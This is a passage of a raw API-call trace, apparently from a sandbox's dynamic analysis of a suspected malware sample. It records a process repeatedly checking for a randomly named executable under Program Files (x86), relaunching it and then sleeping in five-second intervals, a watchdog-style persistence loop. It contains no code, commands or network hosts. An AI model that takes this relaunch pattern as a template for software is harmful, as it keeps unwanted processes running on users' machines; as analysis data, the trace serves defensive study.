out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.344] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20f0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.344] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.344] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65900) returned 1 [0191.344] NtClose (Handle=0x20f0) returned 0x0 [0191.346] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2110, hThread=0x20f0, dwProcessId=0x890, dwThreadId=0x990), hNewToken=0x0) returned 1 [0191.357] Sleep (dwMilliseconds=0x1388) [0191.358] Sleep (dwMilliseconds=0x1388) [0191.360] Sleep (dwMilliseconds=0x1388) [0191.361] Sleep (dwMilliseconds=0x1388) [0191.364] Sleep (dwMilliseconds=0x1388) [0191.367] Sleep (dwMilliseconds=0x1388) [0191.369] Sleep (dwMilliseconds=0x1388) [0191.371] Sleep (dwMilliseconds=0x1388) [0191.372] Sleep (dwMilliseconds=0x1388) [0191.374] Sleep (dwMilliseconds=0x1388) [0191.375] Sleep (dwMilliseconds=0x1388) [0191.377] Sleep (dwMilliseconds=0x1388) [0191.378] Sleep (dwMilliseconds=0x1388) [0191.380] Sleep (dwMilliseconds=0x1388) [0191.381] Sleep (dwMilliseconds=0x1388) [0191.382] Sleep (dwMilliseconds=0x1388) [0191.384] Sleep (dwMilliseconds=0x1388) [0191.385] Sleep (dwMilliseconds=0x1388) [0191.387] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.387] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2114, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.387] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.387] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65800) returned 1 [0191.387] NtQueryInformationFile (in: FileHandle=0x2114, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.387] NtClose (Handle=0x2114) returned 0x0 [0191.388] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.388] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2114, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.388] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.388] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65580) returned 1 [0191.388] NtClose (Handle=0x2114) returned 0x0 [0191.390] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20b8, hThread=0x2114, dwProcessId=0x1244, dwThreadId=0x128c), hNewToken=0x0) returned 1 [0191.402] Sleep (dwMilliseconds=0x1388) [0191.404] Sleep (dwMilliseconds=0x1388) [0191.405] Sleep (dwMilliseconds=0x1388) [0191.407] Sleep (dwMilliseconds=0x1388) [0191.408] Sleep (dwMilliseconds=0x1388) [0191.409] Sleep (dwMilliseconds=0x1388) [0191.411] Sleep (dwMilliseconds=0x1388) [0191.412] Sleep (dwMilliseconds=0x1388) [0191.414] Sleep (dwMilliseconds=0x1388) [0191.415] Sleep (dwMilliseconds=0x1388) [0191.417] Sleep (dwMilliseconds=0x1388) [0191.418] Sleep (dwMilliseconds=0x1388) [0191.420] Sleep (dwMilliseconds=0x1388) [0191.421] Sleep (dwMilliseconds=0x1388) [0191.422] Sleep (dwMilliseconds=0x1388) [0191.424] Sleep (dwMilliseconds=0x1388) [0191.425] Sleep (dwMilliseconds=0x1388) [0191.427] Sleep (dwMilliseconds=0x1388) [0191.429] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.429] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2100, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.429] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.429] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0191.429] NtQueryInformationFile (in: FileHandle=0x2100, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.429] NtClose (Handle=0x2100) returned 0x0 [0191.429] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.429] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2100, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.429] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.429] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0191.429] NtClose (Handle=0x2100) returned 0x0 [0191.431] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20f8, hThread=0x2100, dwProcessId=0x818, dwThreadId=0x808), hNewToken=0x0) returned 1 [0191.441] Sleep (dwMilliseconds=0x1388) [0191.442] Sleep (dwMilliseconds=0x1388) [0191.444] Sleep (dwMilliseconds=0x1388) [0191.445] Sleep (dwMilliseconds=0x1388) [0191.453] Sleep (dwMilliseconds=0x1388) [0191.455] Sleep (dwMilliseconds=0x1388) [0191.456] Sleep (dwMilliseconds=0x1388) [0191.458] Sleep (dwMilliseconds=0x1388) [0191.459] Sleep (dwMilliseconds=0x1388) [0191.461] Sleep (dwMilliseconds=0x1388) [0191.463] Sleep (dwMilliseconds=0x1388) [0191.465] Sleep (dwMilliseconds=0x1388) [0191.466] Sleep (dwMilliseconds=0x1388) [0191.468] Sleep (dwMilliseconds=0x1388) [0191.469] Sleep (dwMilliseconds=0x1388) [0191.471] Sleep (dwMilliseconds=0x1388) [0191.472] Sleep (dwMilliseconds=0x1388) [0191.474] Sleep (dwMilliseconds=0x1388) [0191.475] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.475] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a48, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.476] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.476] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64700) returned 1 [0191.476] NtQueryInformationFile (in: FileHandle=0x1a48, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.476] NtClose (Handle=0x1a48) returned 0x0 [0191.476] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.476] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a48, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.476] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.476] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64f00) returned 1 [0191.476] NtClose (Handle=0x1a48) returned 0x0 [0191.478] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20f4, hThread=0x1a48, dwProcessId=0x12a4, dwThreadId=0x1294), hNewToken=0x0) returned 1 [0191.489] Sleep (dwMilliseconds=0x1388) [0191.491] Sleep (dwMilliseconds=0x1388) [0191.492] Sleep (dwMilliseconds=0x1388) [0191.494] Sleep (dwMilliseconds=0x1388) [0191.497] Sleep (dwMilliseconds=0x1388) [0191.498] Sleep (dwMilliseconds=0x1388) [0191.500] Sleep (dwMilliseconds=0x1388) [0191.501] Sleep (dwMilliseconds=0x1388) [0191.503] Sleep (dwMilliseconds=0x1388) [0191.504] Sleep (dwMilliseconds=0x1388) [0191.506] Sleep (dwMilliseconds=0x1388) [0191.507] Sleep (dwMilliseconds=0x1388) [0191.509] Sleep (dwMilliseconds=0x1388) [0191.510] Sleep (dwMilliseconds=0x1388) [0191.513] Sleep (dwMilliseconds=0x1388) [0191.514] Sleep (dwMilliseconds=0x1388) [0191.516] Sleep (dwMilliseconds=0x1388) [0191.517] Sleep (dwMilliseconds=0x1388) [0191.519] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.519] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20e4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.519] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.519] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65200) returned 1 [0191.519] NtQueryInformationFile (in: FileHandle=0x20e4, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.519] NtClose (Handle=0x20e4) returned 0x0 [0191.519] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.519] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20e4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.519] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.519] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c66000) returned 1 [0191.519] NtClose (Handle=0x20e4) returned 0x0 [0191.521] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20ec, hThread=0x20e4, dwProcessId=0x1240, dwThreadId=0xb78), hNewToken=0x0) returned 1 [0191.534] Sleep (dwMilliseconds=0x1388) [0191.535] Sleep (dwMilliseconds=0x1388) [0191.537] Sleep (dwMilliseconds=0x1388) [0191.538] Sleep (dwMilliseconds=0x1388) [0191.540] Sleep (dwMilliseconds=0x1388) [0191.541] Sleep (dwMilliseconds=0x1388) [0191.543] Sleep (dwMilliseconds=0x1388) [0191.544] Sleep (dwMilliseconds=0x1388) [0191.552] Sleep (dwMilliseconds=0x1388) [0191.554] Sleep (dwMilliseconds=0x1388) [0191.555] Sleep (dwMilliseconds=0x1388) [0191.557] Sleep (dwMilliseconds=0x1388) [0191.558] Sleep (dwMilliseconds=0x1388) [0191.560] Sleep (dwMilliseconds=0x1388) [0191.561] Sleep (dwMilliseconds=0x1388) [0191.565] Sleep (dwMilliseconds=0x1388) [0191.566] Sleep (dwMilliseconds=0x1388) [0191.568] Sleep (dwMilliseconds=0x1388) [0191.569] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.569] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20c4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.570] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.570] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64880) returned 1 [0191.570] NtQueryInformationFile (in: FileHandle=0x20c4, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.570] NtClose (Handle=0x20c4) returned 0x0 [0191.570] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.570] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20c4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.570] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.570] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64900) returned 1 [0191.570] NtClose (Handle=0x20c4) returned 0x0 [0191.573] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20e8, hThread=0x20c4, dwProcessId=0x880, dwThreadId=0x5ec), hNewToken=0x0) returned 1 [0191.591] Sleep (dwMilliseconds=0x1388) [0191.592] Sleep (dwMilliseconds=0x1388) [0191.594] Sleep (dwMilliseconds=0x1388) [0191.599] Sleep (dwMilliseconds=0x1388) [0191.601] Sleep (dwMilliseconds=0x1388) [0191.602] Sleep (dwMilliseconds=0x1388) [0191.604] Sleep (dwMilliseconds=0x1388) [0191.615] Sleep (dwMilliseconds=0x1388) [0191.617] Sleep (dwMilliseconds=0x1388) [0191.619] Sleep (dwMilliseconds=0x1388) [0191.620] Sleep (dwMilliseconds=0x1388) [0191.622] Sleep (dwMilliseconds=0x1388) [0191.623] Sleep (dwMilliseconds=0x1388) [0191.625] Sleep (dwMilliseconds=0x1388) [0191.629] Sleep (dwMilliseconds=0x1388) [0191.630] Sleep (dwMilliseconds=0x1388) [0191.632] Sleep (dwMilliseconds=0x1388) [0191.633] Sleep (dwMilliseconds=0x1388) [0191.635] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.635] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a4c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.635] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.635] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0191.635] NtQueryInformationFile (in: FileHandle=0x1a4c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.635] NtClose (Handle=0x1a4c) returned 0x0 [0191.635] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.635] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a4c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.636] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 